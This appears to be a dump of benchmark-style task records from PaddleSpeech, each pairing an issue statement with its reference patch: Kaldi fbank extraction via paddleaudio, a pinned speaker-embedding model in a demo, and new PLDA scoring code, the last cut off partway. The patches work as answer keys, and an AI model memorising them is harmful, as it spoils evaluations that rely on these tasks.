Column schema of the dataset (the value/length statistics come from the dataset viewer):

| column | dtype | stats |
|---|---|---|
| repo | string (categorical) | 856 distinct values |
| pull_number | int64 | 3 to 127k |
| instance_id | string | length 12 to 58 |
| issue_numbers | sequence of strings | length 1 to 5 |
| base_commit | string | length 40 (git SHA) |
| patch | string | length 67 to 1.54M |
| test_patch | string | length 0 to 107M |
| problem_statement | string | length 3 to 307k |
| hints_text | string | length 0 to 908k |
| created_at | timestamp[s] | |
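The records below follow this schema. As a quick orientation, here is a minimal loading sketch, assuming this dump is published as a Hugging Face dataset; `"<org>/<dataset-name>"` is a placeholder, not a real dataset path:

```python
# Minimal loading sketch; "<org>/<dataset-name>" is a placeholder identifier.
from datasets import load_dataset

ds = load_dataset("<org>/<dataset-name>", split="train")
row = ds[0]
print(row["instance_id"])  # e.g. "PaddlePaddle__PaddleSpeech-1612"
print(row["base_commit"])  # 40-char commit SHA the patch applies to
print(row["patch"][:200])  # unified diff that resolves the linked issue(s)
```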
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1612
instance_id: PaddlePaddle__PaddleSpeech-1612
issue_numbers: ["1611"]
base_commit: 2177a19dd9d79831e7a0b1bac1201588dc44d821
patch:
```diff
diff --git a/paddlespeech/s2t/transform/spectrogram.py b/paddlespeech/s2t/transform/spectrogram.py
--- a/paddlespeech/s2t/transform/spectrogram.py
+++ b/paddlespeech/s2t/transform/spectrogram.py
@@ -14,8 +14,11 @@
 # Modified from espnet(https://github.com/espnet/espnet)
 import librosa
 import numpy as np
+import paddle
 from python_speech_features import logfbank
 
+import paddleaudio.compliance.kaldi as kaldi
+
 
 def stft(x,
          n_fft,
@@ -309,6 +312,77 @@ def __call__(self, x):
 
 
 class LogMelSpectrogramKaldi():
+    def __init__(
+            self,
+            fs=16000,
+            n_mels=80,
+            n_shift=160,  # unit:sample, 10ms
+            win_length=400,  # unit:sample, 25ms
+            energy_floor=0.0,
+            dither=0.1):
+        """
+        The Kaldi implementation of LogMelSpectrogram
+        Args:
+            fs (int): sample rate of the audio
+            n_mels (int): number of mel filter banks
+            n_shift (int): number of points in a frame shift
+            win_length (int): number of points in a frame windows
+            energy_floor (float): Floor on energy in Spectrogram computation (absolute)
+            dither (float): Dithering constant
+
+        Returns:
+            LogMelSpectrogramKaldi
+        """
+
+        self.fs = fs
+        self.n_mels = n_mels
+        num_point_ms = fs / 1000
+        self.n_frame_length = win_length / num_point_ms
+        self.n_frame_shift = n_shift / num_point_ms
+        self.energy_floor = energy_floor
+        self.dither = dither
+
+    def __repr__(self):
+        return (
+            "{name}(fs={fs}, n_mels={n_mels}, "
+            "n_frame_shift={n_frame_shift}, n_frame_length={n_frame_length}, "
+            "dither={dither}))".format(
+                name=self.__class__.__name__,
+                fs=self.fs,
+                n_mels=self.n_mels,
+                n_frame_shift=self.n_frame_shift,
+                n_frame_length=self.n_frame_length,
+                dither=self.dither, ))
+
+    def __call__(self, x, train):
+        """
+        Args:
+            x (np.ndarray): shape (Ti,)
+            train (bool): True, train mode.
+
+        Raises:
+            ValueError: not support (Ti, C)
+
+        Returns:
+            np.ndarray: (T, D)
+        """
+        dither = self.dither if train else 0.0
+        if x.ndim != 1:
+            raise ValueError("Not support x: [Time, Channel]")
+        waveform = paddle.to_tensor(np.expand_dims(x, 0), dtype=paddle.float32)
+        mat = kaldi.fbank(
+            waveform,
+            n_mels=self.n_mels,
+            frame_length=self.n_frame_length,
+            frame_shift=self.n_frame_shift,
+            dither=dither,
+            energy_floor=self.energy_floor,
+            sr=self.fs)
+        mat = np.squeeze(mat.numpy())
+        return mat
+
+
+class LogMelSpectrogramKaldi_decay():
     def __init__(
             self,
             fs=16000,
diff --git a/paddlespeech/s2t/transform/transformation.py b/paddlespeech/s2t/transform/transformation.py
--- a/paddlespeech/s2t/transform/transformation.py
+++ b/paddlespeech/s2t/transform/transformation.py
@@ -31,6 +31,7 @@
     freq_mask="paddlespeech.s2t.transform.spec_augment:FreqMask",
     spec_augment="paddlespeech.s2t.transform.spec_augment:SpecAugment",
     speed_perturbation="paddlespeech.s2t.transform.perturb:SpeedPerturbation",
+    speed_perturbation_sox="paddlespeech.s2t.transform.perturb:SpeedPerturbationSox",
     volume_perturbation="paddlespeech.s2t.transform.perturb:VolumePerturbation",
     noise_injection="paddlespeech.s2t.transform.perturb:NoiseInjection",
     bandpass_perturbation="paddlespeech.s2t.transform.perturb:BandpassPerturbation",
```
problem_statement:
[asr] Replace the original kaldi fbank with the kaldi fbank from paddleaudio

created_at: 2022-03-28T03:39:32
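For context on the record above: the patch routes filterbank extraction through `paddleaudio.compliance.kaldi.fbank`. A minimal sketch of how the new `LogMelSpectrogramKaldi` transform would be exercised, based only on the signature visible in the diff (not verified against a released paddleaudio):

```python
# Sketch based on the patch above; assumes paddlespeech and paddleaudio are
# installed and that the transform keeps the signature shown in the diff.
import numpy as np
from paddlespeech.s2t.transform.spectrogram import LogMelSpectrogramKaldi

extractor = LogMelSpectrogramKaldi(fs=16000, n_mels=80, n_shift=160, win_length=400)
wav = np.random.uniform(-1.0, 1.0, 16000).astype(np.float32)  # 1 s of audio
feat = extractor(wav, train=False)  # dither is disabled outside training
print(feat.shape)  # (T, 80) log-mel filterbank frames
```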
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1644
instance_id: PaddlePaddle__PaddleSpeech-1644
issue_numbers: ["1608"]
base_commit: e366fb6b2feeba384ae1507da707a38c72c78562
patch:
```diff
diff --git a/demos/audio_searching/src/encode.py b/demos/audio_searching/src/encode.py
--- a/demos/audio_searching/src/encode.py
+++ b/demos/audio_searching/src/encode.py
@@ -12,8 +12,8 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 import numpy as np
-from logs import LOGGER
 
+from logs import LOGGER
 from paddlespeech.cli import VectorExecutor
 
 vector_executor = VectorExecutor()
@@ -24,7 +24,8 @@ def get_audio_embedding(path):
         Use vpr_inference to generate embedding of audio
     """
     try:
-        embedding = vector_executor(audio_file=path)
+        embedding = vector_executor(
+            audio_file=path, model='ecapatdnn_voxceleb12')
         embedding = embedding / np.linalg.norm(embedding)
         embedding = embedding.tolist()
         return embedding
```
problem_statement:
[vec][search] update to paddlespeech model

created_at: 2022-04-02T14:33:07
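The one-line fix above pins the speaker-verification model explicitly. A usage sketch mirroring the patched call (the audio path is a placeholder):

```python
# Mirrors the patched get_audio_embedding(); "audio.wav" is a placeholder path.
import numpy as np
from paddlespeech.cli import VectorExecutor

vector_executor = VectorExecutor()
embedding = vector_executor(audio_file="audio.wav", model="ecapatdnn_voxceleb12")
embedding = embedding / np.linalg.norm(embedding)  # L2-normalize, as in the demo
print(embedding.shape)
```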
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1681
instance_id: PaddlePaddle__PaddleSpeech-1681
issue_numbers: ["1667"]
base_commit: 0cde9f87abe07ac67d748fc8815194ee2794f17b
patch:
```diff
diff --git a/paddlespeech/vector/cluster/diarization.py b/paddlespeech/vector/cluster/diarization.py
--- a/paddlespeech/vector/cluster/diarization.py
+++ b/paddlespeech/vector/cluster/diarization.py
@@ -1,4 +1,4 @@
-# Copyright (c) 2022 SpeechBrain Authors. All Rights Reserved.
+# Copyright (c) 2022 PaddlePaddle and SpeechBrain Authors. All Rights Reserved.
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
@@ -18,12 +18,14 @@
 A few sklearn functions are modified in this script as per requirement.
 """
 import argparse
+import copy
 import warnings
 from distutils.util import strtobool
 
 import numpy as np
 import scipy
 import sklearn
+from scipy import linalg
 from scipy import sparse
 from scipy.sparse.csgraph import connected_components
 from scipy.sparse.csgraph import laplacian as csgraph_laplacian
@@ -346,6 +348,8 @@ class EmbeddingMeta:
     ---------
     segset : list
         List of session IDs as an array of strings.
+    modelset : list
+        List of model IDs as an array of strings.
     stats : tensor
         An ndarray of float64. Each line contains embedding
         from the corresponding session.
@@ -354,15 +358,20 @@
     def __init__(
             self,
             segset=None,
+            modelset=None,
             stats=None, ):
         if segset is None:
-            self.segset = numpy.empty(0, dtype="|O")
-            self.stats = numpy.array([], dtype=np.float64)
+            self.segset = np.empty(0, dtype="|O")
+            self.modelset = np.empty(0, dtype="|O")
+            self.stats = np.array([], dtype=np.float64)
         else:
             self.segset = segset
+            self.modelset = modelset
             self.stats = stats
 
+        self.stat0 = np.array([[1.0]] * self.stats.shape[0])
+
     def norm_stats(self):
         """
         Divide all first-order statistics by their Euclidean norm.
@@ -371,6 +380,188 @@ def norm_stats(self):
         vect_norm = np.clip(np.linalg.norm(self.stats, axis=1), 1e-08, np.inf)
         self.stats = (self.stats.transpose() / vect_norm).transpose()
 
+    def get_mean_stats(self):
+        """
+        Return the mean of first order statistics.
+        """
+        mu = np.mean(self.stats, axis=0)
+        return mu
+
+    def get_total_covariance_stats(self):
+        """
+        Compute and return the total covariance matrix of the first-order statistics.
+        """
+        C = self.stats - self.stats.mean(axis=0)
+        return np.dot(C.transpose(), C) / self.stats.shape[0]
+
+    def get_model_stat0(self, mod_id):
+        """Return zero-order statistics of a given model
+
+        Arguments
+        ---------
+        mod_id : str
+            ID of the model which stat0 will be returned.
+        """
+        S = self.stat0[self.modelset == mod_id, :]
+        return S
+
+    def get_model_stats(self, mod_id):
+        """Return first-order statistics of a given model.
+
+        Arguments
+        ---------
+        mod_id : str
+            ID of the model which stat1 will be returned.
+        """
+        return self.stats[self.modelset == mod_id, :]
+
+    def sum_stat_per_model(self):
+        """
+        Sum the zero- and first-order statistics per model and store them
+        in a new EmbeddingMeta.
+        Returns a EmbeddingMeta object with the statistics summed per model
+        and a numpy array with session_per_model.
+        """
+
+        sts_per_model = EmbeddingMeta()
+        sts_per_model.modelset = np.unique(
+            self.modelset)  # nd: get uniq spkr ids
+        sts_per_model.segset = copy.deepcopy(sts_per_model.modelset)
+        sts_per_model.stat0 = np.zeros(
+            (sts_per_model.modelset.shape[0], self.stat0.shape[1]),
+            dtype=np.float64, )
+        sts_per_model.stats = np.zeros(
+            (sts_per_model.modelset.shape[0], self.stats.shape[1]),
+            dtype=np.float64, )
+
+        session_per_model = np.zeros(np.unique(self.modelset).shape[0])
+
+        # For each model sum the stats
+        for idx, model in enumerate(sts_per_model.modelset):
+            sts_per_model.stat0[idx, :] = self.get_model_stat0(model).sum(
+                axis=0)
+            sts_per_model.stats[idx, :] = self.get_model_stats(model).sum(
+                axis=0)
+            session_per_model[idx] += self.get_model_stats(model).shape[0]
+        return sts_per_model, session_per_model
+
+    def center_stats(self, mu):
+        """
+        Center first order statistics.
+
+        Arguments
+        ---------
+        mu : array
+            Array to center on.
+        """
+
+        dim = self.stats.shape[1] / self.stat0.shape[1]
+        index_map = np.repeat(np.arange(self.stat0.shape[1]), dim)
+        self.stats = self.stats - (self.stat0[:, index_map] *
+                                   mu.astype(np.float64))
+
+    def rotate_stats(self, R):
+        """
+        Rotate first-order statistics by a right-product.
+
+        Arguments
+        ---------
+        R : ndarray
+            Matrix to use for right product on the first order statistics.
+        """
+        self.stats = np.dot(self.stats, R)
+
+    def whiten_stats(self, mu, sigma, isSqrInvSigma=False):
+        """
+        Whiten first-order statistics
+        If sigma.ndim == 1, case of a diagonal covariance.
+        If sigma.ndim == 2, case of a single Gaussian with full covariance.
+        If sigma.ndim == 3, case of a full covariance UBM.
+
+        Arguments
+        ---------
+        mu : array
+            Mean vector to be subtracted from the statistics.
+        sigma : narray
+            Co-variance matrix or covariance super-vector.
+        isSqrInvSigma : bool
+            True if the input Sigma matrix is the inverse of the square root of a covariance matrix.
+        """
+
+        if sigma.ndim == 1:
+            self.center_stats(mu)
+            self.stats = self.stats / np.sqrt(sigma.astype(np.float64))
+
+        elif sigma.ndim == 2:
+            # Compute the inverse square root of the co-variance matrix Sigma
+            sqr_inv_sigma = sigma
+
+            if not isSqrInvSigma:
+                # eigen_values, eigen_vectors = scipy.linalg.eigh(sigma)
+                eigen_values, eigen_vectors = linalg.eigh(sigma)
+                ind = eigen_values.real.argsort()[::-1]
+                eigen_values = eigen_values.real[ind]
+                eigen_vectors = eigen_vectors.real[:, ind]
+
+                sqr_inv_eval_sigma = 1 / np.sqrt(eigen_values.real)
+                sqr_inv_sigma = np.dot(eigen_vectors,
+                                       np.diag(sqr_inv_eval_sigma))
+            else:
+                pass
+
+            # Whitening of the first-order statistics
+            self.center_stats(mu)  # CENTERING
+            self.rotate_stats(sqr_inv_sigma)
+
+        elif sigma.ndim == 3:
+            # we assume that sigma is a 3D ndarray of size D x n x n
+            # where D is the number of distributions and n is the dimension of a single distribution
+            n = self.stats.shape[1] // self.stat0.shape[1]
+            sess_nb = self.stat0.shape[0]
+            self.center_stats(mu)
+            self.stats = (np.einsum("ikj,ikl->ilj",
+                                    self.stats.T.reshape(-1, n, sess_nb), sigma)
+                          .reshape(-1, sess_nb).T)
+
+        else:
+            raise Exception("Wrong dimension of Sigma, must be 1 or 2")
+
+    def align_models(self, model_list):
+        """
+        Align models of the current EmbeddingMeta to match a list of models
+        provided as input parameter. The size of the StatServer might be
+        reduced to match the input list of models.
+
+        Arguments
+        ---------
+        model_list : ndarray of strings
+            List of models to match.
+        """
+        indx = np.array(
+            [np.argwhere(self.modelset == v)[0][0] for v in model_list])
+        self.segset = self.segset[indx]
+        self.modelset = self.modelset[indx]
+        self.stat0 = self.stat0[indx, :]
+        self.stats = self.stats[indx, :]
+
+    def align_segments(self, segment_list):
+        """
+        Align segments of the current EmbeddingMeta to match a list of segment
+        provided as input parameter. The size of the StatServer might be
+        reduced to match the input list of segments.
+
+        Arguments
+        ---------
+        segment_list: ndarray of strings
+            list of segments to match
+        """
+        indx = np.array(
+            [np.argwhere(self.segset == v)[0][0] for v in segment_list])
+        self.segset = self.segset[indx]
+        self.modelset = self.modelset[indx]
+        self.stat0 = self.stat0[indx, :]
+        self.stats = self.stats[indx, :]
+
 
 class SpecClustUnorm:
     """
diff --git a/paddlespeech/vector/cluster/plda.py b/paddlespeech/vector/cluster/plda.py
new file mode 100644
--- /dev/null
+++ b/paddlespeech/vector/cluster/plda.py
@@ -0,0 +1,575 @@
+# Copyright (c) 2022 PaddlePaddle and SpeechBrain Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+"""A popular speaker recognition/diarization model (LDA and PLDA).
+
+Relevant Papers
+ - This implementation of PLDA is based on the following papers.
+
+ - PLDA model Training
+   * Ye Jiang et. al, "PLDA Modeling in I-Vector and Supervector Space for Speaker Verification," in Interspeech, 2012.
+   * Patrick Kenny et. al, "PLDA for speaker verification with utterances of arbitrary duration," in ICASSP, 2013.
+
+ - PLDA scoring (fast scoring)
+   * Daniel Garcia-Romero et. al, “Analysis of i-vector length normalization in speaker recognition systems,” in Interspeech, 2011.
+   * Weiwei-LIN et. al, "Fast Scoring for PLDA with Uncertainty Propagation," in Odyssey, 2016.
+   * Kong Aik Lee et. al, "Multi-session PLDA Scoring of I-vector for Partially Open-Set Speaker Detection," in Interspeech 2013.
+
+Credits
+ This code is adapted from: https://git-lium.univ-lemans.fr/Larcher/sidekit
+"""
+import copy
+import pickle
+
+import numpy
+from scipy import linalg
+
+from paddlespeech.vector.cluster.diarization import EmbeddingMeta
+
+
+def ismember(list1, list2):
+    c = [item in list2 for item in list1]
+    return c
+
+
+class Ndx:
+    """
+    A class that encodes trial index information. It has a list of
+    model names and a list of test segment names and a matrix
+    indicating which combinations of model and test segment are
+    trials of interest.
+
+    Arguments
+    ---------
+    modelset : list
+        List of unique models in a ndarray.
+    segset : list
+        List of unique test segments in a ndarray.
+    trialmask : 2D ndarray of bool.
+        Rows correspond to the models and columns to the test segments. True, if the trial is of interest.
+    """
+
+    def __init__(self,
+                 ndx_file_name="",
+                 models=numpy.array([]),
+                 testsegs=numpy.array([])):
+        """
+        Initialize a Ndx object by loading information from a file.
+
+        Arguments
+        ---------
+        ndx_file_name : str
+            Name of the file to load.
+        """
+        self.modelset = numpy.empty(0, dtype="|O")
+        self.segset = numpy.empty(0, dtype="|O")
+        self.trialmask = numpy.array([], dtype="bool")
+
+        if ndx_file_name == "":
+            # This is needed to make sizes same
+            d = models.shape[0] - testsegs.shape[0]
+            if d != 0:
+                if d > 0:
+                    last = str(testsegs[-1])
+                    pad = numpy.array([last] * d)
+                    testsegs = numpy.hstack((testsegs, pad))
+                    # pad = testsegs[-d:]
+                    # testsegs = numpy.concatenate((testsegs, pad), axis=1)
+                else:
+                    d = abs(d)
+                    last = str(models[-1])
+                    pad = numpy.array([last] * d)
+                    models = numpy.hstack((models, pad))
+                    # pad = models[-d:]
+                    # models = numpy.concatenate((models, pad), axis=1)
+
+            modelset = numpy.unique(models)
+            segset = numpy.unique(testsegs)
+
+            trialmask = numpy.zeros(
+                (modelset.shape[0], segset.shape[0]), dtype="bool")
+            for m in range(modelset.shape[0]):
+                segs = testsegs[numpy.array(ismember(models, modelset[m]))]
+                trialmask[m, ] = ismember(segset, segs)  # noqa E231
+
+            self.modelset = modelset
+            self.segset = segset
+            self.trialmask = trialmask
+            assert self.validate(), "Wrong Ndx format"
+
+        else:
+            ndx = Ndx.read(ndx_file_name)
+            self.modelset = ndx.modelset
+            self.segset = ndx.segset
+            self.trialmask = ndx.trialmask
+
+    def save_ndx_object(self, output_file_name):
+        with open(output_file_name, "wb") as output:
+            pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)
+
+    def filter(self, modlist, seglist, keep):
+        """
+        Removes some of the information in an Ndx. Useful for creating a
+        gender specific Ndx from a pooled gender Ndx. Depending on the
+        value of \'keep\', the two input lists indicate the strings to
+        retain or the strings to discard.
+
+        Arguments
+        ---------
+        modlist : array
+            A cell array of strings which will be compared with the modelset of 'inndx'.
+        seglist : array
+            A cell array of strings which will be compared with the segset of 'inndx'.
+        keep : bool
+            Indicating whether modlist and seglist are the models to keep or discard.
+        """
+        if keep:
+            keepmods = modlist
+            keepsegs = seglist
+        else:
+            keepmods = diff(self.modelset, modlist)
+            keepsegs = diff(self.segset, seglist)
+
+        keepmodidx = numpy.array(ismember(self.modelset, keepmods))
+        keepsegidx = numpy.array(ismember(self.segset, keepsegs))
+
+        outndx = Ndx()
+        outndx.modelset = self.modelset[keepmodidx]
+        outndx.segset = self.segset[keepsegidx]
+        tmp = self.trialmask[numpy.array(keepmodidx), :]
+        outndx.trialmask = tmp[:, numpy.array(keepsegidx)]
+
+        assert outndx.validate, "Wrong Ndx format"
+
+        if self.modelset.shape[0] > outndx.modelset.shape[0]:
+            print(
+                "Number of models reduced from %d to %d" %
+                self.modelset.shape[0],
+                outndx.modelset.shape[0], )
+        if self.segset.shape[0] > outndx.segset.shape[0]:
+            print(
+                "Number of test segments reduced from %d to %d",
+                self.segset.shape[0],
+                outndx.segset.shape[0], )
+        return outndx
+
+    def validate(self):
+        """
+        Checks that an object of type Ndx obeys certain rules that
+        must always be true. Returns a boolean value indicating whether the object is valid
+        """
+        ok = isinstance(self.modelset, numpy.ndarray)
+        ok &= isinstance(self.segset, numpy.ndarray)
+        ok &= isinstance(self.trialmask, numpy.ndarray)
+
+        ok &= self.modelset.ndim == 1
+        ok &= self.segset.ndim == 1
+        ok &= self.trialmask.ndim == 2
+
+        ok &= self.trialmask.shape == (self.modelset.shape[0],
+                                       self.segset.shape[0], )
+        return ok
+
+
+class Scores:
+    """
+    A class for storing scores for trials. The modelset and segset
+    fields are lists of model and test segment names respectively.
+    The element i,j of scoremat and scoremask corresponds to the
+    trial involving model i and test segment j.
+
+    Arguments
+    ---------
+    modelset : list
+        List of unique models in a ndarray.
+    segset : list
+        List of unique test segments in a ndarray.
+    scoremask : 2D ndarray of bool
+        Indicates the trials of interest, i.e.,
+        the entry i,j in scoremat should be ignored if scoremask[i,j] is False.
+    scoremat : 2D ndarray
+        Scores matrix.
+    """
+
+    def __init__(self, scores_file_name=""):
+        """
+        Initialize a Scores object by loading information from a file HDF5 format.
+
+        Arguments
+        ---------
+        scores_file_name : str
+            Name of the file to load.
+        """
+        self.modelset = numpy.empty(0, dtype="|O")
+        self.segset = numpy.empty(0, dtype="|O")
+        self.scoremask = numpy.array([], dtype="bool")
+        self.scoremat = numpy.array([])
+
+        if scores_file_name == "":
+            pass
+        else:
+            tmp = Scores.read(scores_file_name)
+            self.modelset = tmp.modelset
+            self.segset = tmp.segset
+            self.scoremask = tmp.scoremask
+            self.scoremat = tmp.scoremat
+
+    def __repr__(self):
+        ch = "modelset:\n"
+        ch += self.modelset + "\n"
+        ch += "segset:\n"
+        ch += self.segset + "\n"
+        ch += "scoremask:\n"
+        ch += self.scoremask.__repr__() + "\n"
+        ch += "scoremat:\n"
+        ch += self.scoremat.__repr__() + "\n"
+
+
+def fa_model_loop(
+        batch_start,
+        mini_batch_indices,
+        factor_analyser,
+        stat0,
+        stats,
+        e_h,
+        e_hh, ):
+    """
+    A function for PLDA estimation.
+
+    Arguments
+    ---------
+    batch_start : int
+        Index to start at in the list.
+    mini_batch_indices : list
+        Indices of the elements in the list (should start at zero).
+    factor_analyser : instance of PLDA class
+        PLDA class object.
+    stat0 : tensor
+        Matrix of zero-order statistics.
+    stats: tensor
+        Matrix of first-order statistics.
+    e_h : tensor
+        An accumulator matrix.
+    e_hh: tensor
+        An accumulator matrix.
+    """
+    rank = factor_analyser.F.shape[1]
+    if factor_analyser.Sigma.ndim == 2:
+        A = factor_analyser.F.T.dot(factor_analyser.F)
+        inv_lambda_unique = dict()
+        for sess in numpy.unique(stat0[:, 0]):
+            inv_lambda_unique[sess] = linalg.inv(sess * A + numpy.eye(A.shape[
+                0]))
+
+    tmp = numpy.zeros(
+        (factor_analyser.F.shape[1], factor_analyser.F.shape[1]),
+        dtype=numpy.float64, )
+
+    for idx in mini_batch_indices:
+        if factor_analyser.Sigma.ndim == 1:
+            inv_lambda = linalg.inv(
+                numpy.eye(rank) + (factor_analyser.F.T * stat0[
+                    idx + batch_start, :]).dot(factor_analyser.F))
+        else:
+            inv_lambda = inv_lambda_unique[stat0[idx + batch_start, 0]]
+
+        aux = factor_analyser.F.T.dot(stats[idx + batch_start, :])
+        numpy.dot(aux, inv_lambda, out=e_h[idx])
+        e_hh[idx] = inv_lambda + numpy.outer(e_h[idx], e_h[idx], tmp)
+
+
+def _check_missing_model(enroll, test, ndx):
+    # Remove missing models and test segments
+    clean_ndx = ndx.filter(enroll.modelset, test.segset, True)
+
+    # Align EmbeddingMeta to match the clean_ndx
+    enroll.align_models(clean_ndx.modelset)
+    test.align_segments(clean_ndx.segset)
+
+    return clean_ndx
+
+
+class PLDA:
+    """
+    A class to train PLDA model from embeddings.
+
+    The input is in paddlespeech.vector.cluster.diarization.EmbeddingMeta format.
+    Trains a simplified PLDA model no within-class covariance matrix but full residual covariance matrix.
+
+    Arguments
+    ---------
+    mean : tensor
+        Mean of the vectors.
+    F : tensor
+        Eigenvoice matrix.
+    Sigma : tensor
+        Residual matrix.
+    """
+
+    def __init__(
+            self,
+            mean=None,
+            F=None,
+            Sigma=None,
+            rank_f=100,
+            nb_iter=10,
+            scaling_factor=1.0, ):
+        self.mean = None
+        self.F = None
+        self.Sigma = None
+        self.rank_f = rank_f
+        self.nb_iter = nb_iter
+        self.scaling_factor = scaling_factor
+
+        if mean is not None:
+            self.mean = mean
+        if F is not None:
+            self.F = F
+        if Sigma is not None:
+            self.Sigma = Sigma
+
+    def plda(
+            self,
+            emb_meta=None,
+            output_file_name=None, ):
+        """
+        Trains PLDA model with no within class covariance matrix but full residual covariance matrix.
+
+        Arguments
+        ---------
+        emb_meta : paddlespeech.vector.cluster.diarization.EmbeddingMeta
+            Contains vectors and meta-information to perform PLDA
+        rank_f : int
+            Rank of the between-class covariance matrix.
+        nb_iter : int
+            Number of iterations to run.
+        scaling_factor : float
+            Scaling factor to downscale statistics (value between 0 and 1).
+        output_file_name : str
+            Name of the output file where to store PLDA model.
+        """
+
+        # Dimension of the vector (x-vectors stored in stats)
+        vect_size = emb_meta.stats.shape[1]
+
+        # Initialize mean and residual covariance from the training data
+        self.mean = emb_meta.get_mean_stats()
+        self.Sigma = emb_meta.get_total_covariance_stats()
+
+        # Sum stat0 and stat1 for each speaker model
+        model_shifted_stat, session_per_model = emb_meta.sum_stat_per_model()
+
+        # Number of speakers (classes) in training set
+        class_nb = model_shifted_stat.modelset.shape[0]
+
+        # Multiply statistics by scaling_factor
+        model_shifted_stat.stat0 *= self.scaling_factor
+        model_shifted_stat.stats *= self.scaling_factor
+        session_per_model *= self.scaling_factor
+
+        # Covariance for stats
+        sigma_obs = emb_meta.get_total_covariance_stats()
+        evals, evecs = linalg.eigh(sigma_obs)
+
+        # Initial F (eigen voice matrix) from rank
+        idx = numpy.argsort(evals)[::-1]
+        evecs = evecs.real[:, idx[:self.rank_f]]
+        self.F = evecs[:, :self.rank_f]
+
+        # Estimate PLDA model by iterating the EM algorithm
+        for it in range(self.nb_iter):
+
+            # E-step
+
+            # Copy stats as they will be whitened with a different Sigma for each iteration
+            local_stat = copy.deepcopy(model_shifted_stat)
+
+            # Whiten statistics (with the new mean and Sigma)
+            local_stat.whiten_stats(self.mean, self.Sigma)
+
+            # Whiten the EigenVoice matrix
+            eigen_values, eigen_vectors = linalg.eigh(self.Sigma)
+            ind = eigen_values.real.argsort()[::-1]
+            eigen_values = eigen_values.real[ind]
+            eigen_vectors = eigen_vectors.real[:, ind]
+            sqr_inv_eval_sigma = 1 / numpy.sqrt(eigen_values.real)
+            sqr_inv_sigma = numpy.dot(eigen_vectors,
+                                      numpy.diag(sqr_inv_eval_sigma))
+            self.F = sqr_inv_sigma.T.dot(self.F)
+
+            # Replicate self.stat0
+            index_map = numpy.zeros(vect_size, dtype=int)
+            _stat0 = local_stat.stat0[:, index_map]
+
+            e_h = numpy.zeros((class_nb, self.rank_f))
+            e_hh = numpy.zeros((class_nb, self.rank_f, self.rank_f))
+
+            # loop on model id's
+            fa_model_loop(
+                batch_start=0,
+                mini_batch_indices=numpy.arange(class_nb),
+                factor_analyser=self,
+                stat0=_stat0,
+                stats=local_stat.stats,
+                e_h=e_h,
+                e_hh=e_hh, )
+
+            # Accumulate for minimum divergence step
+            _R = numpy.sum(e_hh, axis=0) / session_per_model.shape[0]
+
+            _C = e_h.T.dot(local_stat.stats).dot(linalg.inv(sqr_inv_sigma))
+            _A = numpy.einsum("ijk,i->jk", e_hh, local_stat.stat0.squeeze())
+
+            # M-step
+            self.F = linalg.solve(_A, _C).T
+
+            # Update the residual covariance
+            self.Sigma = sigma_obs - self.F.dot(_C) / session_per_model.sum()
+
+            # Minimum Divergence step
+            self.F = self.F.dot(linalg.cholesky(_R))
+
+    def scoring(
+            self,
+            enroll,
+            test,
+            ndx,
+            test_uncertainty=None,
+            Vtrans=None,
+            p_known=0.0,
+            scaling_factor=1.0,
+            check_missing=True, ):
+        """
+        Compute the PLDA scores between to sets of vectors. The list of
+        trials to perform is given in an Ndx object. PLDA matrices have to be
+        pre-computed. i-vectors/x-vectors are supposed to be whitened before.
+
+        Arguments
+        ---------
+        enroll : paddlespeech.vector.cluster.diarization.EmbeddingMeta
+            A EmbeddingMeta in which stats are xvectors.
+        test : paddlespeech.vector.cluster.diarization.EmbeddingMeta
+            A EmbeddingMeta in which stats are xvectors.
+        ndx : paddlespeech.vector.cluster.plda.Ndx
+            An Ndx object defining the list of trials to perform.
+        p_known : float
+            Probability of having a known speaker for open-set
+            identification case (=1 for the verification task and =0 for the
+            closed-set case).
+        check_missing : bool
+            If True, check that all models and segments exist.
+        """
+
+        enroll_ctr = copy.deepcopy(enroll)
+        test_ctr = copy.deepcopy(test)
+
+        # Remove missing models and test segments
+        if check_missing:
+            clean_ndx = _check_missing_model(enroll_ctr, test_ctr, ndx)
+        else:
+            clean_ndx = ndx
+
+        # Center the i-vectors around the PLDA mean
+        enroll_ctr.center_stats(self.mean)
+        test_ctr.center_stats(self.mean)
+
+        # Compute constant component of the PLDA distribution
+        invSigma = linalg.inv(self.Sigma)
+        I_spk = numpy.eye(self.F.shape[1], dtype="float")
+
+        K = self.F.T.dot(invSigma * scaling_factor).dot(self.F)
+        K1 = linalg.inv(K + I_spk)
+        K2 = linalg.inv(2 * K + I_spk)
+
+        # Compute the Gaussian distribution constant
+        alpha1 = numpy.linalg.slogdet(K1)[1]
+        alpha2 = numpy.linalg.slogdet(K2)[1]
+        plda_cst = alpha2 / 2.0 - alpha1
+
+        # Compute intermediate matrices
+        Sigma_ac = numpy.dot(self.F, self.F.T)
+        Sigma_tot = Sigma_ac + self.Sigma
+        Sigma_tot_inv = linalg.inv(Sigma_tot)
+
+        Tmp = linalg.inv(Sigma_tot - Sigma_ac.dot(Sigma_tot_inv).dot(Sigma_ac))
+        Phi = Sigma_tot_inv - Tmp
+        Psi = Sigma_tot_inv.dot(Sigma_ac).dot(Tmp)
+
+        # Compute the different parts of PLDA score
+        model_part = 0.5 * numpy.einsum("ij, ji->i",
+                                        enroll_ctr.stats.dot(Phi),
+                                        enroll_ctr.stats.T)
+        seg_part = 0.5 * numpy.einsum("ij, ji->i",
+                                      test_ctr.stats.dot(Phi), test_ctr.stats.T)
+
+        # Compute verification scores
+        score = Scores()  # noqa F821
+        score.modelset = clean_ndx.modelset
+        score.segset = clean_ndx.segset
+        score.scoremask = clean_ndx.trialmask
+
+        score.scoremat = model_part[:, numpy.newaxis] + seg_part + plda_cst
+        score.scoremat += enroll_ctr.stats.dot(Psi).dot(test_ctr.stats.T)
+        score.scoremat *= scaling_factor
+
